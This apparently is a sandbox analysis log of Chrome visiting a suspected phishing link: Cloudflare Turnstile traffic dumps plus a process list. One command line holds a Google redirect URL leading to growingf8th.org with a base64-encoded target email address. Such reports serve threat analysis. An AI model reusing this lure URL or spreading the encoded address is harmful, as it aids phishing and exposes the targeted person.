                                          22192.168.2.549749104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:34 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:34 UTC379INHTTP/1.1 404 Not Found
                                          Date: Wed, 08 Jan 2025 15:13:34 GMT
                                          Content-Type: application/json
                                          Content-Length: 7
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          cf-chl-out: s7Z1sNY8sNFEsl6TI7hH3OvG0xTQZvSzkxE=$Q4sxhdClg2n1K/kd
                                          Server: cloudflare
                                          CF-RAY: 8fed21de28f5f5f7-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:34 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                          Data Ascii: invalid


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          23192.168.2.549773104.18.94.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:38 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          Content-Length: 34514
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          Content-type: application/x-www-form-urlencoded
                                          CF-Chl-RetryAttempt: 0
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          CF-Challenge: uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Origin: https://challenges.cloudflare.com
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/kx1oo/0x4AAAAAAA4xQO3i_we8Fbpp/auto/fbE/normal/auto/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:38 UTC16384OUTData Raw: 76 5f 38 66 65 64 32 31 62 36 66 64 36 36 63 33 34 33 3d 7a 6a 54 31 6d 38 4d 48 37 38 37 69 54 69 53 4d 61 71 54 31 66 6a 59 48 38 33 4d 6d 52 6a 6e 31 6b 54 4d 4c 52 35 31 52 43 4d 70 52 42 52 71 54 38 70 52 36 59 4a 52 69 44 2d 69 38 52 45 63 31 38 33 37 44 52 58 43 38 49 52 41 65 2d 31 5a 52 75 44 69 70 52 44 44 63 44 44 5a 31 7a 54 7a 4f 77 52 6b 2d 78 37 2d 52 4d 43 4d 66 69 63 43 38 74 52 66 58 6d 67 6c 5a 52 53 43 48 34 52 53 62 58 73 56 55 55 69 2d 69 33 54 52 69 2d 34 52 30 31 69 49 52 38 6a 52 71 63 54 52 6c 36 47 6f 54 31 4d 66 65 4d 71 57 2d 41 50 77 48 44 52 67 54 25 32 62 74 4d 37 48 74 67 2d 6e 34 76 72 6d 6a 6f 52 4d 61 67 52 52 45 49 31 67 54 6c 77 52 31 54 2d 34 70 4e 50 6b 49 71 76 30 31 4f 4f 67 75 2d 30 44 46 7a 64 44 55 34 52 72 55
                                          Data Ascii: v_8fed21b6fd66c343=zjT1m8MH787iTiSMaqT1fjYH83MmRjn1kTMLR51RCMpRBRqT8pR6YJRiD-i8REc1837DRXC8IRAe-1ZRuDipRDDcDDZ1zTzOwRk-x7-RMCMficC8tRfXmglZRSCH4RSbXsVUUi-i3TRi-4R01iIR8jRqcTRl6GoT1MfeMqW-APwHDRgT%2btM7Htg-n4vrmjoRMagRREI1gTlwR1T-4pNPkIqv01OOgu-0DFzdDU4RrU
                                          2025-01-08 15:13:38 UTC16384OUTData Raw: 42 57 59 57 6d 5a 44 34 52 6e 4b 7a 4b 5a 52 75 76 71 31 38 54 52 55 52 4a 31 75 52 52 24 52 50 49 41 63 74 36 31 7a 31 66 31 71 35 52 59 52 41 31 71 2d 52 58 33 50 31 50 6a 4d 4d 52 55 44 38 39 31 41 52 4d 44 4d 35 52 4f 52 69 31 50 55 4d 7a 52 50 44 69 78 4d 56 52 75 59 78 35 4d 6e 52 70 52 50 35 52 73 6c 69 34 71 38 4d 78 52 67 4a 71 52 52 71 4b 2d 6a 59 34 4d 6c 52 42 74 59 44 53 34 54 74 4b 24 54 69 6c 52 59 31 69 4a 52 37 52 38 31 71 56 4d 49 52 4c 31 68 52 4d 4a 52 45 44 2b 67 41 55 4b 38 4a 4d 48 56 69 52 51 31 54 59 69 4d 52 6d 53 52 53 52 66 52 38 54 74 55 52 24 5a 58 56 52 72 31 78 52 4f 38 6d 24 76 53 70 54 62 24 6a 30 62 78 51 38 73 68 56 66 51 70 73 65 24 30 64 51 51 73 78 71 57 72 51 4f 56 69 71 56 61 67 38 62 46 38 52 63 51 42 38 6d 66 4d
                                          Data Ascii: BWYWmZD4RnKzKZRuvq18TRURJ1uRR$RPIAct61z1f1q5RYRA1q-RX3P1PjMMRUD891ARMDM5RORi1PUMzRPDixMVRuYx5MnRpRP5Rsli4q8MxRgJqRRqK-jY4MlRBtYDS4TtK$TilRY1iJR7R81qVMIRL1hRMJRED+gAUK8JMHViRQ1TYiMRmSRSRfR8TtUR$ZXVRr1xRO8m$vSpTb$j0bxQ8shVfQpse$0dQQsxqWrQOViqVag8bF8RcQB8mfM
                                          2025-01-08 15:13:38 UTC1746OUTData Raw: 6a 39 32 54 59 68 4d 24 32 24 31 52 31 4c 71 44 4c 31 52 44 52 63 48 4e 4c 53 64 2d 61 54 4c 4b 66 70 41 58 52 4f 78 74 32 6b 4c 52 54 44 50 54 58 4a 31 38 24 48 38 53 72 37 49 2d 32 4f 72 78 70 6e 53 4b 77 67 6c 44 6b 4e 6e 50 35 33 52 52 48 35 78 39 31 76 51 43 4d 42 72 42 31 66 70 73 78 4c 34 52 48 6e 71 77 65 6e 2b 48 37 69 41 34 4f 55 46 4c 4d 46 33 54 54 54 61 59 53 52 53 43 74 6a 74 62 78 4a 43 54 36 4d 70 4d 6e 37 52 4c 53 43 70 36 66 24 52 74 6c 43 4e 52 51 77 33 69 69 4d 74 57 50 59 56 69 50 52 4f 24 76 49 31 61 32 39 54 52 56 52 66 66 63 58 54 6e 58 53 31 51 51 53 53 2b 6a 78 6e 70 32 30 24 2d 78 45 45 71 64 66 6c 49 57 43 38 31 6b 35 74 64 35 70 6c 52 67 52 53 59 46 4e 4d 59 30 46 4e 62 5a 52 64 44 43 43 69 53 6b 4a 42 44 54 59 43 4d 54 53 4a
                                          Data Ascii: j92TYhM$2$1R1LqDL1RDRcHNLSd-aTLKfpAXROxt2kLRTDPTXJ18$H8Sr7I-2OrxpnSKwglDkNnP53RRH5x91vQCMBrB1fpsxL4RHnqwen+H7iA4OUFLMF3TTTaYSRSCtjtbxJCT6MpMn7RLSCp6f$RtlCNRQw3iiMtWPYViPRO$vI1a29TRVRffcXTnXS1QQSS+jxnp20$-xEEqdflIWC81k5td5plRgRSYFNMY0FNbZRdDCCiSkJBDTYCMTSJ
                                          2025-01-08 15:13:39 UTC274INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 4624
                                          Connection: close
                                          cf-chl-out: NiqUe5P+zeMvyII2x5V0l6O83ELcGJWh/8CliVjnYEUhcAIH9qS7Tc0UfNpW6Iyw62FgW1Mym9Yt+jJhHZGUhp8sdQVZq/zzW5T8aTdA3Q==$lAdN164kNQn4tDvS
                                          2025-01-08 15:13:39 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 65 49 47 74 4e 44 6c 61 61 64 61 50 2f 30 66 55 64 58 45 31 66 76 5a 5a 78 47 42 6e 41 62 71 34 4b 50 47 35 38 50 73 4e 61 56 57 47 4d 30 48 59 4a 57 75 79 68 35 41 51 33 65 79 64 49 53 61 53 73 56 4e 63 4b 65 46 2b 4c 78 30 4e 38 68 65 39 62 53 61 6d 6d 72 55 55 49 67 76 63 76 4c 72 41 75 38 73 65 44 4d 7a 72 4d 6a 55 32 47 45 65 31 4f 34 2b 67 49 63 47 55 46 37 30 71 44 35 69 79 33 65 72 49 57 42 38 2f 73 42 44 73 4b 79 6b 69 6c 36 33 54 56 47 35 2f 53 4d 62 48 78 4a 63 5a 48 4c 31 73 4d 4a 4f 57 78 72 55 79 53 59 65 57 49 52 63 76 6b 61 70 72 4b 45 73 34 73 62 32 59 45 44 6d 69 56 75 61 31 57 36 45 6a 66 6e 74 4f 79 66 4b 59 41 45 32 4f 43 51 6c 34 66 63 64 2f 41 71 57 71 53 35 53 48 56 52 6f 66 41 79 4a 78 52
                                          Data Ascii: cf-chl-out-s: eIGtNDlaadaP/0fUdXE1fvZZxGBnAbq4KPG58PsNaVWGM0HYJWuyh5AQ3eydISaSsVNcKeF+Lx0N8he9bSammrUUIgvcvLrAu8seDMzrMjU2GEe1O4+gIcGUF70qD5iy3erIWB8/sBDsKykil63TVG5/SMbHxJcZHL1sMJOWxrUySYeWIRcvkaprKEs4sb2YEDmiVua1W6EjfntOyfKYAE2OCQl4fcd/AqWqS5SHVRofAyJxR
                                          2025-01-08 15:13:39 UTC1369INData Raw: 5a 6e 39 59 56 6d 39 4e 63 46 32 51 6a 59 56 57 6a 6f 56 74 54 4a 78 33 63 48 2b 66 6d 35 35 77 70 47 53 44 6c 6c 32 58 64 4b 71 41 64 58 57 49 67 34 57 73 6f 34 4f 4b 62 49 4e 79 6a 72 71 76 64 70 4b 2b 76 58 32 73 6a 4d 42 31 73 61 53 51 6b 4a 47 55 76 5a 69 6c 6f 5a 36 59 71 4c 75 79 70 39 4c 45 78 36 66 55 6b 4c 57 62 79 61 69 56 6d 39 79 58 72 4b 76 54 73 4f 65 31 77 4b 44 4a 75 64 72 66 76 63 2f 77 7a 4f 32 38 38 66 62 71 74 2b 50 59 2b 72 6e 34 35 76 79 2f 2f 65 44 4d 74 63 33 51 2f 4e 62 51 77 4f 76 5a 31 73 7a 64 33 65 6b 45 35 64 7a 73 41 51 6a 6b 46 64 44 30 32 2f 50 73 47 4e 45 65 2f 65 44 61 38 77 49 62 49 51 48 6c 41 4f 6b 61 2f 53 2f 34 49 2b 30 79 4b 76 49 56 42 2b 6b 52 42 78 73 5a 46 53 59 55 4c 7a 38 4f 45 41 46 46 2f 42 73 64 45 30 63
                                          Data Ascii: Zn9YVm9NcF2QjYVWjoVtTJx3cH+fm55wpGSDll2XdKqAdXWIg4Wso4OKbINyjrqvdpK+vX2sjMB1saSQkJGUvZiloZ6YqLuyp9LEx6fUkLWbyaiVm9yXrKvTsOe1wKDJudrfvc/wzO288fbqt+PY+rn45vy//eDMtc3Q/NbQwOvZ1szd3ekE5dzsAQjkFdD02/PsGNEe/eDa8wIbIQHlAOka/S/4I+0yKvIVB+kRBxsZFSYULz8OEAFF/BsdE0c
                                          2025-01-08 15:13:39 UTC1369INData Raw: 34 4f 54 55 33 52 54 55 35 4b 53 67 6c 68 78 65 48 68 73 6e 34 71 64 57 6c 5a 38 6f 31 31 78 71 6e 31 37 71 6f 52 6d 5a 6f 6d 61 72 59 4e 71 67 4a 64 74 6b 62 4b 4d 69 61 65 2b 76 4c 2b 56 72 73 4a 2b 73 70 6d 6c 68 34 69 6b 79 73 71 43 71 4a 33 50 70 72 43 77 6a 49 72 47 31 59 6e 53 6c 39 57 70 32 4d 71 33 6e 70 4b 34 34 4f 53 61 7a 72 7a 6d 6d 73 6e 4c 36 74 72 49 79 71 48 76 34 75 71 70 34 4f 36 30 76 2f 62 51 32 61 33 52 78 65 67 42 37 64 58 69 77 62 62 63 2b 73 62 66 32 41 6a 43 43 65 54 4f 7a 4e 44 6f 45 4f 44 54 43 78 59 59 37 77 63 61 32 41 63 50 47 39 2f 6f 2b 43 48 77 34 77 2f 6c 32 53 59 4a 35 66 4d 62 2f 53 48 75 43 43 38 55 4e 43 45 52 45 50 59 32 4e 78 66 78 42 78 6b 30 44 67 41 2f 51 66 73 78 4e 30 62 35 53 43 6b 71 43 54 6b 45 4d 43 41 44
                                          Data Ascii: 4OTU3RTU5KSglhxeHhsn4qdWlZ8o11xqn17qoRmZomarYNqgJdtkbKMiae+vL+VrsJ+spmlh4ikysqCqJ3PprCwjIrG1YnSl9Wp2Mq3npK44OSazrzmmsnL6trIyqHv4uqp4O60v/bQ2a3RxegB7dXiwbbc+sbf2AjCCeTOzNDoEODTCxYY7wca2AcPG9/o+CHw4w/l2SYJ5fMb/SHuCC8UNCEREPY2NxfxBxk0DgA/QfsxN0b5SCkqCTkEMCAD
                                          2025-01-08 15:13:39 UTC1369INData Raw: 61 48 6c 59 78 6b 6e 48 79 4e 61 4a 68 74 65 6c 61 52 58 49 43 51 70 49 43 4b 59 32 6c 39 6a 6f 6d 6e 63 47 70 2b 6c 49 65 34 6f 6d 2b 6b 63 70 43 71 6e 72 35 2b 6f 4a 46 35 6d 34 53 2b 6e 4d 4f 53 74 5a 2f 4c 79 36 53 64 70 72 43 77 6a 39 4b 4c 79 64 6a 55 72 4c 53 53 73 62 43 57 72 35 62 4b 6e 4a 76 65 7a 70 2b 6a 77 65 4c 44 71 2b 76 4d 34 36 76 67 7a 4d 75 73 33 74 37 4c 73 63 44 4a 32 63 72 52 37 2b 69 38 37 65 72 56 75 74 76 59 39 74 4b 36 2f 75 66 46 34 4f 6e 75 33 63 38 44 46 4d 76 4b 34 41 73 5a 38 4d 2f 70 30 65 54 78 45 4f 66 53 43 77 4c 6a 2b 67 4c 78 34 79 55 6b 39 43 30 47 4b 43 41 78 47 79 38 43 36 51 6f 56 38 7a 6b 6c 45 68 7a 35 4f 53 73 77 51 50 49 76 48 51 41 30 4c 78 51 41 43 53 56 4d 43 79 5a 48 48 77 6c 41 4d 54 41 47 42 77 31 41 43
                                          Data Ascii: aHlYxknHyNaJhtelaRXICQpICKY2l9jomncGp+lIe4om+kcpCqnr5+oJF5m4S+nMOStZ/Ly6SdprCwj9KLydjUrLSSsbCWr5bKnJvezp+jweLDq+vM46vgzMus3t7LscDJ2crR7+i87erVutvY9tK6/ufF4Onu3c8DFMvK4AsZ8M/p0eTxEOfSCwLj+gLx4yUk9C0GKCAxGy8C6QoV8zklEhz5OSswQPIvHQA0LxQACSVMCyZHHwlAMTAGBw1AC
                                          2025-01-08 15:13:39 UTC517INData Raw: 75 64 36 4b 43 59 58 35 35 6a 33 56 78 71 71 42 6e 6c 70 61 65 66 47 2b 6e 6e 49 43 67 6b 4a 52 7a 6a 4a 57 62 69 62 69 6e 72 33 32 76 6f 4b 44 45 77 5a 53 46 78 37 5a 2f 6d 5a 69 34 69 35 79 4b 79 39 4b 70 6b 71 76 47 74 59 6d 76 70 62 65 4e 70 64 62 50 6e 73 72 4b 75 36 79 37 73 4c 4f 66 77 64 62 69 70 75 6a 57 71 71 66 49 72 2b 76 42 79 39 54 65 72 73 33 49 31 37 66 33 37 76 37 4e 79 65 37 43 76 4f 37 2b 78 72 2f 48 42 77 7a 43 34 66 72 62 32 67 44 37 38 78 51 50 44 41 48 6e 47 41 66 71 37 50 41 50 38 65 33 36 39 51 50 78 2f 52 50 33 39 43 4d 67 48 43 73 73 44 68 41 76 49 42 77 6c 41 53 55 4f 4b 54 67 6f 4a 77 6b 4b 4a 79 73 51 44 53 73 30 4a 42 51 45 4e 43 38 57 51 30 51 39 47 69 59 34 4f 55 38 51 51 79 51 68 56 45 63 6f 4a 56 4e 54 4c 69 6f 6d 56 79
                                          Data Ascii: ud6KCYX55j3VxqqBnlpaefG+nnICgkJRzjJWbibinr32voKDEwZSFx7Z/mZi4i5yKy9KpkqvGtYmvpbeNpdbPnsrKu6y7sLOfwdbipujWqqfIr+vBy9Ters3I17f37v7Nye7CvO7+xr/HBwzC4frb2gD78xQPDAHnGAfq7PAP8e369QPx/RP39CMgHCssDhAvIBwlASUOKTgoJwkKJysQDSs0JBQENC8WQ0Q9GiY4OU8QQyQhVEcoJVNTLiomVy


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          24192.168.2.549778104.18.95.414433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:39 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1391608476:1736346727:knR3U4ghk5DvrWm8Z0ppO7GRdQqqvFtYvV0BfWnt7jY/8fed21b6fd66c343/uFX7jtvfVSbsLDHzd_D0mPynkmsoYGulVzTiO1UjW7I-1736349208-1.1.1.1-fY3TV0on5VPSwhpvLSt8Rd53gHoedzkoXnJBOIA.OPMrOb.ffVuX8nJLBMSvOmVR HTTP/1.1
                                          Host: challenges.cloudflare.com
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:39 UTC379INHTTP/1.1 404 Not Found
                                          Date: Wed, 08 Jan 2025 15:13:39 GMT
                                          Content-Type: application/json
                                          Content-Length: 7
                                          Connection: close
                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                          cf-chl-out: M4CZU4xaM4qpYms+h1W61vexHwqXlBz4wec=$xQtLCYnmRj6V04r2
                                          Server: cloudflare
                                          CF-RAY: 8fed21fecf92425f-EWR
                                          alt-svc: h3=":443"; ma=86400
                                          2025-01-08 15:13:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                          Data Ascii: invalid


                                          Click to jump to process

                                          Click to jump to process

                                          Click to jump to process

                                          Target ID:0
                                          Start time:10:13:12
                                          Start date:08/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                          Imagebase:0x7ff715980000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:2
                                          Start time:10:13:15
                                          Start date:08/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1936,i,4928317751555499273,12545574023170528116,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                          Imagebase:0x7ff715980000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:false

                                          Target ID:3
                                          Start time:10:13:21
                                          Start date:08/01/2025
                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==60Pms7JnShWaY3TYp1tJfM6oLKC&rct=0GbqKUbKEUOA0yP6gBhAVbg0AlI6i1vFvwuOapuWmP7TbqjETP71sUvBq6eZihhNTt&sa=t&url=amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20="
                                          Imagebase:0x7ff715980000
                                          File size:3'242'272 bytes
                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          No disassembly